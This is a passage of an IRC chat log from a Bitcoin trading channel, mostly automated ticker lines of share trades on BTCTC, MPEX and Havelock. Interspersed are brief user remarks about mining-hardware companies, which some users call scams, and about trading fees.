0.0248 = 0.0496 BTC [+] Jul 17 01:36:47 [BTCTC] [AMC-PT] 100 @ 0.002499 = 0.2499 BTC [+] Jul 17 01:37:01 [BTCTC] [AMC-PT] 3500 @ 0.002499 = 8.7465 BTC [+] Jul 17 01:37:14 [BTCTC] [ASICMINER-PT] 1 @ 4.33103 BTC [-] Jul 17 01:37:48 [MPEX] [S.MPOE] 5758 @ 0.00092274 = 5.3131 BTC [-] Jul 17 01:37:49 [MPEX] [S.MPOE] 1630 @ 0.00092458 = 1.5071 BTC [+] Jul 17 01:38:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.042365 BTC [-] Jul 17 01:38:31 [BTCTC] [AMC-PT] 1000 @ 0.002499 = 2.499 BTC [+] Jul 17 01:39:22 [BTCTC] [AMC-PT] 1677 @ 0.002499 = 4.1908 BTC [+] Jul 17 01:39:32 [BTCTC] [AMC-PT] 400 @ 0.002499 = 0.9996 BTC [+] Jul 17 01:40:00 [BTCTC] [AMC-PT] 45 @ 0.002499 = 0.1125 BTC [+] Jul 17 01:40:26 [BTCTC] [AMC-PT] 400 @ 0.002499 = 0.9996 BTC [+] Jul 17 01:40:59 [BTCTC] [AMC-PT] 45 @ 0.002499 = 0.1125 BTC [+] Jul 17 01:41:07 [BTCTC] [AMC-PT] 683 @ 0.002499 = 1.7068 BTC [+] Jul 17 01:41:37 thestringpuller: this one? http://jfk.hood.edu/Collection/Weisberg%20Subject%20Index%20Files/C%20Disk/CIA%20Assassinations/Item%2009.pdf Jul 17 01:41:43 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 17 01:41:55 [BTCTC] [AMC-PT] 300 @ 0.0025 = 0.75 BTC [+] Jul 17 01:43:30 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 17 01:44:35 [BTCTC] [ASICMINER-PT] 1 @ 4.33103 BTC [-] Jul 17 01:46:02 [BTCTC] [AMC-PT] 1653 @ 0.0025 = 4.1325 BTC [+] Jul 17 01:47:26 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 17 01:47:40 [BTCTC] [AMC-PT] 70 @ 0.0025 = 0.175 BTC [+] Jul 17 01:53:51 [BTCTC] [BASIC-MINING] 11 @ 0.65 = 7.15 BTC [-] Jul 17 01:55:04 [BTCTC] [B.YABMC] 1 @ 0.00281 BTC [-] Jul 17 01:55:07 [HAVELOCK] [AM100] 120 @ 0.041386 = 4.9663 BTC [-] Jul 17 01:56:33 [MPEX] [S.MPOE] 3047 @ 0.00092491 = 2.8182 BTC [+] Jul 17 01:57:09 [HAVELOCK] [AM100] 124 @ 0.041386 = 5.1319 BTC [-] Jul 17 01:59:49 [HAVELOCK] [AM100] 3 @ 0.040405 = 0.1212 BTC [-] Jul 17 02:00:28 [HAVELOCK] [VTX] 10 @ 0.799 = 7.99 BTC [-] Jul 17 02:00:29 [BTCTC] [AMC-PT] 175 @ 0.0025 = 0.4375 BTC [+] Jul 17 02:01:06 [BTCTC] [DMS.MINING] 11 @ 0.015 = 0.165 BTC [-] Jul 17 02:02:19 [HAVELOCK] [AM100] 116 @ 0.040405 = 4.687 BTC [-] Jul 17 02:02:30 [BTCTC] [AMC-PT] 46 @ 0.0025 = 0.115 BTC [+] Jul 17 02:02:57 [BTCTC] [TAT.ASICMINER] 27 @ 0.042373 = 1.1441 BTC [+] Jul 17 02:05:07 [BTCTC] [AMC-PT] 450 @ 0.0025 = 1.125 BTC [+] Jul 17 02:06:18 http://www.flickr.com/photos/98907028@N08/9279239205/ all the time i thought the logo was photoshopped (vmc) Jul 17 02:06:41 [BTCTC] [TAT.ASICMINER] 29 @ 0.042373 = 1.2288 BTC [+] Jul 17 02:07:47 looks better on that wall than on the webpage Jul 17 02:08:59 [MPEX] [S.MPOE] 6100 @ 0.00092666 = 5.6526 BTC [+] Jul 17 02:09:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.042375 = 0.1271 BTC [+] Jul 17 02:10:57 dude that guy looks evil Jul 17 02:11:04 [BTCTC] [AMC-PT] 55 @ 0.0025 = 0.1375 BTC [+] Jul 17 02:11:41 [BTCTC] [COGNITIVE] 1 @ 0.86 BTC [+] Jul 17 02:11:50 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 17 02:12:01 he must be security Jul 17 02:12:19 are they going to release hardware soon Jul 17 02:13:41 "AM Launches The Worlds Fastest Bitcoin Mining Machine At 24.576 TH/s" Jul 17 02:13:47 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jul 17 02:14:00 http://farm5.static.flickr.com/4031/4687490085_579bca1589.jpg Jul 17 02:14:04 i'm not sure, they started to take preorders now Jul 17 02:14:19 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 17 02:14:27 AM? Jul 17 02:14:31 http://farm5.static.flickr.com/4031/4687490085_579bca1589.jpg Jul 17 02:15:09 "active mining" Jul 17 02:15:21 there is much discussion about this company Jul 17 02:15:31 was it here? Jul 17 02:15:46 not sure if yummy or cute ;) Jul 17 02:15:50 they say the got the fastest chip at 16GHs Jul 17 02:15:57 [HAVELOCK] [VTX] 1 @ 0.79999 BTC [+] Jul 17 02:15:58 [HAVELOCK] [VTX] 5 @ 0.79999 = 4 BTC [+] Jul 17 02:15:59 I am pretty sure KnC has a 100GHs Jul 17 02:16:02 kakobrekla remember the hungarian comp ? Jul 17 02:16:13 how could i forget Jul 17 02:16:16 afaik the chip isn't in production yet Jul 17 02:16:18 Blastbob you mean in their dreams or what ? Jul 17 02:16:39 AM or KNC? :) Jul 17 02:16:48 yes. Jul 17 02:18:59 :P Jul 17 02:19:10 they are collecting money for the nrc for *that chip or do they have more than one chip and this 16 gh/s chip is ready? x_x Jul 17 02:20:40 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 17 02:20:42 think they got that money already Jul 17 02:20:48 now they are preselling hardware Jul 17 02:20:59 [HAVELOCK] [SDSTM] 10 @ 0.0111 = 0.111 BTC [+] Jul 17 02:21:32 lmao Jul 17 02:21:41 this is actually the perfect scam as it turns out. Jul 17 02:21:51 launch "asset", leech whatever btc off the "investors" Jul 17 02:22:16 then pre-sell "hardware". leech part deux off the wanna-be miners, and the lesser scammers running lesser 'assets", ie pmbs Jul 17 02:22:19 double whammy. Jul 17 02:22:29 [BTCTC] [AMC-PT] 19 @ 0.0025 = 0.0475 BTC [+] Jul 17 02:24:10 hm.. i doubt this is a pure scam. they seem to have the intention to deliver. Jul 17 02:25:03 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 17 02:25:54 [MPEX] [S.MPOE] 3787 @ 0.00092666 = 3.5093 BTC [+] Jul 17 02:25:54 [MPEX] [S.MPOE] 1700 @ 0.00092703 = 1.576 BTC [+] Jul 17 02:26:07 [MPEX] [S.MPOE] 1763 @ 0.00092829 = 1.6366 BTC [+] Jul 17 02:26:21 read up on basic miner, that's the prototype Jul 17 02:26:29 "intention to deliver", what's that ? Jul 17 02:27:02 what do you mean with "that's the prototype"? Jul 17 02:28:00 do you know what the word means ? Jul 17 02:28:24 sure, but i don't see the connection between am and bm Jul 17 02:29:00 [BTCTC] [ASICMINER-PT] 2 @ 4.34 = 8.68 BTC [+] Jul 17 02:29:02 basic mining was the first run of the "intended to deliver but fucked everyone over anyway" Jul 17 02:30:10 i didn't know about that. you talk about the asset on btct, right? Jul 17 02:30:26 nope. Jul 17 02:30:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.042379 = 0.4238 BTC [+] Jul 17 02:30:41 it was a very lulzy "company" last year. Jul 17 02:30:49 and my reference to the hungarians earlier was exactly the same thing Jul 17 02:32:00 some "company" tghat intended to deliver. and was going to even meet people to "show they're legit". then kakobrekla drove hundreds of miles and the cocksuckers simply hid away Jul 17 02:32:12 basically they had imagined they can make the claims and nobody;s going to verify Jul 17 02:32:20 [BTCTC] [AMC-PT] 170 @ 0.0025 = 0.425 BTC [+] Jul 17 02:32:25 wow okay Jul 17 02:32:54 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 17 02:33:54 so yeah, it's kinda easy as a new guy to figure all this shit is what it claims to be Jul 17 02:34:05 after you've been here a few years and you've seen it go down... different outlook. Jul 17 02:34:36 [BTCTC] [TAT.ASICMINER] 61 @ 0.043397 = 2.6472 BTC [+] Jul 17 02:35:35 [BTCTC] [ASICMINER-PT] 1 @ 4.34 BTC [+] Jul 17 02:37:26 [BTCTC] [ASICMINER-PT] 1 @ 4.34 BTC [+] Jul 17 02:38:29 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 17 02:41:43 [HAVELOCK] [VTX] 23 @ 0.79999 = 18.3998 BTC [+] Jul 17 02:43:18 [BTCTC] [COGNITIVE] 1 @ 0.830001 BTC [-] Jul 17 02:43:20 [BTCTC] [COGNITIVE] 2 @ 0.83 = 1.66 BTC [-] Jul 17 02:46:06 [HAVELOCK] [VTX] 1 @ 0.79999 BTC [+] Jul 17 02:47:33 [BTCTC] [TAT.ASICMINER] 9 @ 0.043397 = 0.3906 BTC [+] Jul 17 02:47:35 [BTCTC] [TAT.ASICMINER] 48 @ 0.043398 = 2.0831 BTC [+] Jul 17 02:51:26 [MPEX] [S.MPOE] 9087 @ 0.00092829 = 8.4354 BTC [+] Jul 17 02:51:27 [MPEX] [S.MPOE] 3431 @ 0.00092952 = 3.1892 BTC [+] Jul 17 02:52:39 [BTCTC] [B.YABMC] 1 @ 0.00297 BTC [+] Jul 17 02:57:38 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 17 03:02:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004398 BTC [+] Jul 17 03:03:01 [BTCTC] [AMC-PT] 39 @ 0.002499 = 0.0975 BTC [-] Jul 17 03:03:54 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [+] Jul 17 03:04:21 [BTCTC] [COGNITIVE] 1 @ 0.810011 BTC [-] Jul 17 03:04:23 [BTCTC] [COGNITIVE] 1 @ 0.81001 BTC [-] Jul 17 03:04:25 [BTCTC] [COGNITIVE] 1 @ 0.8 BTC [-] Jul 17 03:04:26 [BTCTC] [COGNITIVE] 1 @ 0.78 BTC [-] Jul 17 03:04:28 [HAVELOCK] [AM100] 5 @ 0.04132 = 0.2066 BTC [+] Jul 17 03:04:29 [HAVELOCK] [AM100] 32 @ 0.04132 = 1.3222 BTC [+] Jul 17 03:04:49 [BTCTC] [AMC-PT] 40000 @ 0.0025 = 100 BTC [+] Jul 17 03:06:31 [BTCTC] [AMC-PT] 1500 @ 0.0025 = 3.75 BTC [+] Jul 17 03:08:52 [BTCTC] [AMC-PT] 9 @ 0.0025 = 0.0225 BTC [+] Jul 17 03:09:50 [BTCTC] [BASIC-MINING] 8 @ 0.67 = 5.36 BTC [+] Jul 17 03:10:00 [BTCTC] [COGNITIVE] 1 @ 0.771 BTC [-] Jul 17 03:10:02 [BTCTC] [COGNITIVE] 1 @ 0.770002 BTC [-] Jul 17 03:10:28 [BTCTC] [COGNITIVE] 1 @ 0.849999 BTC [+] Jul 17 03:10:29 [BTCTC] [COGNITIVE] 1 @ 0.85 BTC [+] Jul 17 03:10:31 [BTCTC] [COGNITIVE] 3 @ 0.86 = 2.58 BTC [+] Jul 17 03:10:32 [BTCTC] [COGNITIVE] 1 @ 0.88 BTC [+] Jul 17 03:10:33 [BTCTC] [COGNITIVE] 2 @ 0.887 = 1.774 BTC [+] Jul 17 03:10:35 [BTCTC] [COGNITIVE] 2 @ 0.8876 = 1.7752 BTC [+] Jul 17 03:10:36 [BTCTC] [COGNITIVE] 6 @ 0.88765 = 5.3259 BTC [+] Jul 17 03:11:14 [BTCTC] [BASIC-MINING] 4 @ 0.674998 = 2.7 BTC [+] Jul 17 03:11:15 [BTCTC] [BASIC-MINING] 7 @ 0.675 = 4.725 BTC [+] Jul 17 03:11:17 [BTCTC] [BASIC-MINING] 1 @ 0.679 BTC [+] Jul 17 03:11:18 [BTCTC] [BASIC-MINING] 5 @ 0.679795 = 3.399 BTC [+] Jul 17 03:11:20 [BTCTC] [BASIC-MINING] 3 @ 0.68 = 2.04 BTC [+] Jul 17 03:11:21 [BTCTC] [BASIC-MINING] 2 @ 0.687 = 1.374 BTC [+] Jul 17 03:12:02 [BTCTC] [DMS.MINING] 1 @ 0.015002 BTC [+] Jul 17 03:12:04 [BTCTC] [DMS.MINING] 10 @ 0.015001 = 0.15 BTC [-] Jul 17 03:12:05 [BTCTC] [DMS.MINING] 189 @ 0.015 = 2.835 BTC [-] Jul 17 03:12:20 [BTCTC] [BASIC-MINING] 8 @ 0.687 = 5.496 BTC [+] Jul 17 03:12:32 [BTCTC] [BASIC-MINING] 7 @ 0.687 = 4.809 BTC [+] Jul 17 03:13:24 [BTCTC] [COGNITIVE] 2 @ 0.88765 = 1.7753 BTC [+] Jul 17 03:13:28 [BTCTC] [ASICMINER-PT] 5 @ 4.340001 = 21.7 BTC [+] Jul 17 03:15:37 [BTCTC] [BASIC-MINING] 3 @ 0.686999 = 2.061 BTC [-] Jul 17 03:16:03 [BTCTC] [AMC-PT] 120 @ 0.0025 = 0.3 BTC [+] Jul 17 03:16:31 [BTCTC] [COGNITIVE] 2 @ 0.8 = 1.6 BTC [-] Jul 17 03:16:46 [BTCTC] [BASIC-MINING] 3 @ 0.687 = 2.061 BTC [+] Jul 17 03:17:19 [BTCTC] [BASIC-MINING] 10 @ 0.687 = 6.87 BTC [+] Jul 17 03:17:21 [BTCTC] [BASIC-MINING] 1 @ 0.688002 BTC [+] Jul 17 03:17:22 [BTCTC] [BASIC-MINING] 20 @ 0.688888 = 13.7778 BTC [+] Jul 17 03:17:38 [BTCTC] [LTC-ATF.B2] 1 @ 0.010101 BTC [-] Jul 17 03:18:37 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 17 03:19:49 [HAVELOCK] [AM100] 22 @ 0.041 = 0.902 BTC [-] Jul 17 03:20:00 [BTCTC] [COGNITIVE] 2 @ 0.8 = 1.6 BTC [-] Jul 17 03:20:35 [BTCTC] [BASIC-MINING] 2 @ 0.688888 = 1.3778 BTC [+] Jul 17 03:20:59 [HAVELOCK] [AM100] 8 @ 0.041319 = 0.3306 BTC [+] Jul 17 03:21:09 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 17 03:22:22 [BTCTC] [COGNITIVE] 2 @ 0.8 = 1.6 BTC [-] Jul 17 03:22:42 [BTCTC] [BASIC-MINING] 2 @ 0.688888 = 1.3778 BTC [+] Jul 17 03:23:18 [BTCTC] [COGNITIVE] 1 @ 0.887699 BTC [+] Jul 17 03:23:20 [BTCTC] [COGNITIVE] 2 @ 0.8877 = 1.7754 BTC [+] Jul 17 03:23:22 [BTCTC] [COGNITIVE] 1 @ 0.8877 BTC [+] Jul 17 03:23:23 [BTCTC] [COGNITIVE] 2 @ 0.8878 = 1.7756 BTC [+] Jul 17 03:23:25 [BTCTC] [COGNITIVE] 2 @ 0.8879 = 1.7758 BTC [+] Jul 17 03:23:26 [BTCTC] [COGNITIVE] 27 @ 0.888 = 23.976 BTC [+] Jul 17 03:24:28 [BTCTC] [BASIC-MINING] 1 @ 0.688888 BTC [+] Jul 17 03:25:05 [BTCTC] [BASIC-MINING] 6 @ 0.6895 = 4.137 BTC [+] Jul 17 03:25:44 basic is acquiring the next 500 gh/s upgrade, if this motion passes: https://btct.co/security/BASIC-MINING#tab5 Jul 17 03:26:48 [BTCTC] [AMC-PT] 6 @ 0.002499 = 0.015 BTC [-] Jul 17 03:26:49 [BTCTC] [AMC-PT] 67 @ 0.002499 = 0.1674 BTC [-] Jul 17 03:27:14 [BTCTC] [AMC-PT] 100 @ 0.002493 = 0.2493 BTC [-] Jul 17 03:27:32 [BTCTC] [DMS.SELLING] 1 @ 0.02445 BTC [-] Jul 17 03:27:34 [BTCTC] [DMS.SELLING] 1 @ 0.023401 BTC [-] Jul 17 03:27:36 [BTCTC] [DMS.SELLING] 11 @ 0.0233 = 0.2563 BTC [-] Jul 17 03:27:50 [BTCTC] [BASIC-MINING] 1 @ 0.689499 BTC [-] Jul 17 03:27:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.042397 = 0.0848 BTC [-] Jul 17 03:29:06 [BTCTC] [ASICMINER-PT] 1 @ 4.39589 BTC [+] Jul 17 03:29:08 [BTCTC] [ASICMINER-PT] 1 @ 4.395891 BTC [+] Jul 17 03:29:10 [BTCTC] [ASICMINER-PT] 1 @ 4.395893 BTC [+] Jul 17 03:31:31 [BTCTC] [BASIC-MINING] 2 @ 0.689499 = 1.379 BTC [-] Jul 17 03:31:59 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jul 17 03:32:38 [BTCTC] [BASIC-MINING] 1 @ 0.6895 BTC [+] Jul 17 03:32:52 [BTCTC] [BASIC-MINING] 3 @ 0.6895 = 2.0685 BTC [+] Jul 17 03:32:54 [BTCTC] [BASIC-MINING] 1 @ 0.7 BTC [+] Jul 17 03:35:19 [BTCTC] [BASIC-MINING] 1 @ 0.7 BTC [+] Jul 17 03:35:27 [BTCTC] [COGNITIVE] 1 @ 0.899999 BTC [+] Jul 17 03:35:29 [BTCTC] [COGNITIVE] 1 @ 0.9 BTC [+] Jul 17 03:35:31 [BTCTC] [COGNITIVE] 21 @ 0.9 = 18.9 BTC [+] Jul 17 03:36:42 [BTCTC] [AMC-PT] 49 @ 0.002492 = 0.1221 BTC [-] Jul 17 03:36:44 [BTCTC] [AMC-PT] 77 @ 0.002491 = 0.1918 BTC [-] Jul 17 03:36:46 [BTCTC] [AMC-PT] 100 @ 0.002491 = 0.2491 BTC [-] Jul 17 03:36:48 [BTCTC] [AMC-PT] 1 @ 0.002483 BTC [-] Jul 17 03:36:50 [BTCTC] [AMC-PT] 100 @ 0.002483 = 0.2483 BTC [-] Jul 17 03:36:51 [BTCTC] [AMC-PT] 1 @ 0.002482 BTC [-] Jul 17 03:36:53 [BTCTC] [AMC-PT] 50 @ 0.002481 = 0.1241 BTC [-] Jul 17 03:36:54 [BTCTC] [AMC-PT] 100 @ 0.00248 = 0.248 BTC [-] Jul 17 03:36:56 [BTCTC] [AMC-PT] 100 @ 0.00248 = 0.248 BTC [-] Jul 17 03:36:57 [BTCTC] [AMC-PT] 100 @ 0.002479 = 0.2479 BTC [-] Jul 17 03:36:59 [BTCTC] [AMC-PT] 100 @ 0.002478 = 0.2478 BTC [-] Jul 17 03:37:00 [BTCTC] [AMC-PT] 100 @ 0.002477 = 0.2477 BTC [-] Jul 17 03:37:02 [BTCTC] [AMC-PT] 100 @ 0.002476 = 0.2476 BTC [-] Jul 17 03:37:03 [BTCTC] [AMC-PT] 100 @ 0.002475 = 0.2475 BTC [-] Jul 17 03:37:03 [BTCTC] [AMC-PT] 45 @ 0.002472 = 0.1112 BTC [-] Jul 17 03:37:05 [BTCTC] [AMC-PT] 50 @ 0.002472 = 0.1236 BTC [-] Jul 17 03:37:08 [BTCTC] [AMC-PT] 1231 @ 0.00247 = 3.0406 BTC [-] Jul 17 03:37:10 [BTCTC] [AMC-PT] 1300 @ 0.002467 = 3.2071 BTC [-] Jul 17 03:37:11 [BTCTC] [AMC-PT] 774 @ 0.00246 = 1.904 BTC [-] Jul 17 03:37:15 [BTCTC] [BASIC-MINING] 3 @ 0.7 = 2.1 BTC [+] Jul 17 03:37:51 [BTCTC] [BASIC-MINING] 1 @ 0.699999 BTC [-] Jul 17 03:37:53 [BTCTC] [BASIC-MINING] 10 @ 0.7 = 7 BTC [+] Jul 17 03:37:54 [BTCTC] [BASIC-MINING] 4 @ 0.700001 = 2.8 BTC [+] Jul 17 03:38:51 [BTCTC] [DMS.MINING] 175 @ 0.015 = 2.625 BTC [-] Jul 17 03:38:53 [BTCTC] [DMS.MINING] 1 @ 0.015 BTC [-] Jul 17 03:39:14 [BTCTC] [BASIC-MINING] 3 @ 0.700001 = 2.1 BTC [+] Jul 17 03:40:34 [BTCTC] [ASICMINER-PT] 1 @ 4.340011 BTC [-] Jul 17 03:41:03 [BTCTC] [BASIC-MINING] 6 @ 0.700001 = 4.2 BTC [+] Jul 17 03:42:37 [BTCTC] [BASIC-MINING] 12 @ 0.700001 = 8.4 BTC [+] Jul 17 03:42:47 [BTCTC] [DMS.SELLING] 15 @ 0.023301 = 0.3495 BTC [+] Jul 17 03:43:30 [BTCTC] [DMS.SELLING] 5 @ 0.023301 = 0.1165 BTC [+] Jul 17 03:44:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.042401 = 0.212 BTC [+] Jul 17 03:44:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.042401 BTC [+] Jul 17 03:44:40 [BTCTC] [BASIC-MINING] 1 @ 0.739995 BTC [+] Jul 17 03:47:37 [BTCTC] [BASIC-MINING] 1 @ 0.739995 BTC [+] Jul 17 03:48:03 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 17 03:50:33 trading btcusd is such a suckers game with those fucking fees Jul 17 03:50:55 where do you trade? Jul 17 03:50:59 mtgox Jul 17 03:54:18 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 17 03:54:28 [BTCTC] [ASICMINER-PT] 1 @ 4.34001 BTC [-] Jul 17 03:54:44 [BTCTC] [BASIC-MINING] 1 @ 0.739995 BTC [+] Jul 17 03:55:24 [BTCTC] [BASIC-MINING] 1 @ 0.739995 BTC [+] Jul 17 03:55:26 [BTCTC] [BASIC-MINING] 2 @ 0.74 = 1.48 BTC [+] Jul 17 03:55:26 [BTCTC] [BASIC-MINING] 1 @ 0.744 BTC [+] Jul 17 03:55:27 [BTCTC] [BASIC-MINING] 1 @ 0.75 BTC [+] Jul 17 04:02:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.043396 = 0.3472 BTC [+] Jul 17 04:02:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.043397 BTC [+] Jul 17 04:02:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.043398 = 0.0868 BTC [+] Jul 17 04:02:56 [BTCTC] [TAT.ASICMINER] 14 @ 0.0434 = 0.6076 BTC [+] Jul 17 04:03:16 [BTCTC] [ASICMINER-PT] 1 @ 4.34 BTC [-] Jul 17 04:05:35 [BTCTC] [BITVPS] 3 @ 0.00175 = 0.0053 BTC [-] Jul 17 04:08:09 [MPEX] [S.MPOE] 9665 @ 0.00092792 = 8.9683 BTC [-] Jul 17 04:10:05 [BTCTC] [BASIC-MINING] 1 @ 0.7499 BTC [-] Jul 17 04:11:23 [BTCTC] [BASIC-MINING] 1 @ 0.7499 BTC [-] Jul 17 04:16:20 [BTCTC] [BASIC-MINING] 3 @ 0.700002 = 2.1 BTC [-] Jul 17 04:16:22 [BTCTC] [BASIC-MINING] 1 @ 0.66 BTC [-] Jul 17 04:16:23 [BTCTC] [BASIC-MINING] 8 @ 0.66 = 5.28 BTC [-] Jul 17 04:16:25 [BTCTC] [BASIC-MINING] 1 @ 0.65 BTC [-] Jul 17 04:16:25 [BTCTC] [BASIC-MINING] 1 @ 0.63 BTC [-] Jul 17 04:16:27 [BTCTC] [BASIC-MINING] 4 @ 0.610183 = 2.4407 BTC [-] Jul 17 04:16:28 [BTCTC] [BASIC-MINING] 1 @ 0.610182 BTC [-] Jul 17 04:16:29 [BTCTC] [BASIC-MINING] 16 @ 0.610001 = 9.76 BTC [-] Jul 17 04:16:31 [BTCTC] [BASIC-MINING] 1 @ 0.610001 BTC [-] Jul 17 04:16:32 [BTCTC] [BASIC-MINING] 8 @ 0.592005 = 4.736 BTC [-] Jul 17 04:16:33 [BTCTC] [BASIC-MINING] 10 @ 0.592 = 5.92 BTC [-] Jul 17 04:16:34 [BTCTC] [BASIC-MINING] 11 @ 0.5601 = 6.1611 BTC [-] Jul 17 04:16:36 [BTCTC] [BASIC-MINING] 1 @ 0.5601 BTC [-] Jul 17 04:21:26 [BTCTC] [DMS.PURCHASE] 5 @ 0.039806 = 0.199 BTC [-] Jul 17 04:23:22 [BTCTC] [ASICMINER-PT] 1 @ 4.388999 BTC [+] Jul 17 04:26:12 woah Jul 17 04:26:17 @basic Jul 17 04:27:44 [BTCTC] [AMC-PT] 600 @ 0.0025 = 1.5 BTC [+] Jul 17 04:27:47 [BTCTC] [ASICMINER-PT] 1 @ 4.388999 BTC [+] Jul 17 04:28:33 [BTCTC] [BASIC-MINING] 1 @ 0.749998 BTC [+] Jul 17 04:28:35 [BTCTC] [BASIC-MINING] 3 @ 0.749999 = 2.25 BTC [+] Jul 17 04:28:36 [BTCTC] [BASIC-MINING] 2 @ 0.75 = 1.5 BTC [+] Jul 17 04:30:36 [BTCTC] [BASIC-MINING] 2 @ 0.75 = 1.5 BTC [+] Jul 17 04:30:38 [BTCTC] [BASIC-MINING] 1 @ 0.75 BTC [+] Jul 17 04:30:40 [BTCTC] [BASIC-MINING] 3 @ 0.75 = 2.25 BTC [+] Jul 17 04:30:47 [BTCTC] [AMC-PT] 9 @ 0.0025 = 0.0225 BTC [+] Jul 17 04:31:35 [BTCTC] [ASICMINER-PT] 1 @ 4.346001 BTC [-] Jul 17 04:32:10 [BTCTC] [TAT.ASICMINER] 46 @ 0.0434 = 1.9964 BTC [+] Jul 17 04:32:19 [BTCTC] [ASICMINER-PT] 1 @ 4.388999 BTC [+] Jul 17 04:32:21 [BTCTC] [BASIC-MINING] 2 @ 0.75 = 1.5 BTC [+] Jul 17 04:32:23 [BTCTC] [BASIC-MINING] 4 @ 0.75 = 3 BTC [+] Jul 17 04:32:33 [BTCTC] [TAT.ASICMINER] 21 @ 0.0434 = 0.9114 BTC [+] Jul 17 04:33:43 [BTCTC] [DMS.MINING] 1 @ 0.0145 BTC [-] Jul 17 04:34:06 [BTCTC] [ASICMINER-PT] 5 @ 4.347009 = 21.735 BTC [-] Jul 17 04:34:47 [BTCTC] [BASIC-MINING] 16 @ 0.75 = 12 BTC [+] Jul 17 04:34:49 [BTCTC] [BASIC-MINING] 1 @ 0.761 BTC [+] Jul 17 04:34:50 [BTCTC] [BASIC-MINING] 4 @ 0.789499 = 3.158 BTC [+] Jul 17 04:34:52 [BTCTC] [BASIC-MINING] 6 @ 0.7895 = 4.737 BTC [+] Jul 17 04:35:39 [BTCTC] [ASICMINER-PT] 1 @ 4.388999 BTC [+] Jul 17 04:35:53 [BTCTC] [S.DICE-PT] 2 @ 0.002273 = 0.0045 BTC [-] Jul 17 04:35:55 [BTCTC] [S.DICE-PT] 19 @ 0.002257 = 0.0429 BTC [-] Jul 17 04:35:57 [BTCTC] [S.DICE-PT] 979 @ 0.00225 = 2.2028 BTC [-] Jul 17 04:36:24 [BTCTC] [BASIC-MINING] 1 @ 0.7895 BTC [+] Jul 17 04:36:48 [BTCTC] [BASIC-MINING] 3 @ 0.7895 = 2.3685 BTC [+] Jul 17 04:36:49 [BTCTC] [BASIC-MINING] 2 @ 0.794 = 1.588 BTC [+] Jul 17 04:36:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.0434 = 0.1736 BTC [+] Jul 17 04:37:00 [BTCTC] [BASIC-MINING] 8 @ 0.794 = 6.352 BTC [+] Jul 17 04:37:02 [BTCTC] [BASIC-MINING] 2 @ 0.8 = 1.6 BTC [+] Jul 17 04:37:03 [BTCTC] [BASIC-MINING] 6 @ 0.8 = 4.8 BTC [+] Jul 17 04:37:05 [BTCTC] [BASIC-MINING] 8 @ 0.8 = 6.4 BTC [+] Jul 17 04:37:15 [BTCTC] [ASICMINER-PT] 1 @ 4.388999 BTC [+] Jul 17 04:37:26 [BTCTC] [BASIC-MINING] 1 @ 0.794 BTC [-] Jul 17 04:39:42 [BTCTC] [ASICMINER-PT] 1 @ 4.388999 BTC [+] Jul 17 04:39:44 [BTCTC] [ASICMINER-PT] 1 @ 4.389 BTC [+] Jul 17 04:41:35 [BTCTC] [ASICMINER-PT] 1 @ 4.389 BTC [+] Jul 17 04:42:24 [BTCTC] [BASIC-MINING] 1 @ 0.79999 BTC [+] Jul 17 04:43:18 [BTCTC] [BASIC-MINING] 19 @ 0.79999 = 15.1998 BTC [+] Jul 17 04:44:29 [BTCTC] [AMC-PT] 485 @ 0.0025 = 1.2125 BTC [+] Jul 17 04:44:43 [BTCTC] [COGNITIVE] 1 @ 0.897999 BTC [-] Jul 17 04:44:45 [BTCTC] [COGNITIVE] 1 @ 0.898 BTC [+] Jul 17 04:44:46 [BTCTC] [COGNITIVE] 2 @ 0.9 = 1.8 BTC [+] Jul 17 04:45:30 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 17 04:45:46 [BTCTC] [COGNITIVE] 1 @ 0.915 BTC [+] Jul 17 04:45:48 [BTCTC] [COGNITIVE] 1 @ 0.91777 BTC [+] Jul 17 04:45:49 [BTCTC] [COGNITIVE] 26 @ 0.917888 = 23.8651 BTC [+] Jul 17 04:45:51 [BTCTC] [COGNITIVE] 5 @ 0.91798 = 4.5899 BTC [+] Jul 17 04:46:34 [BTCTC] [TAT.ASICMINER] 4 @ 0.0434 = 0.1736 BTC [+] Jul 17 04:47:58 [BTCTC] [PAJKA.BOND] 1 @ 0.049783 BTC [+] Jul 17 04:49:15 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 17 04:50:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.0434 = 0.0868 BTC [+] Jul 17 04:51:16 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19999 BTC [+] Jul 17 04:51:29 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 17 04:52:32 [BTCTC] [ASICMINER-PT] 10 @ 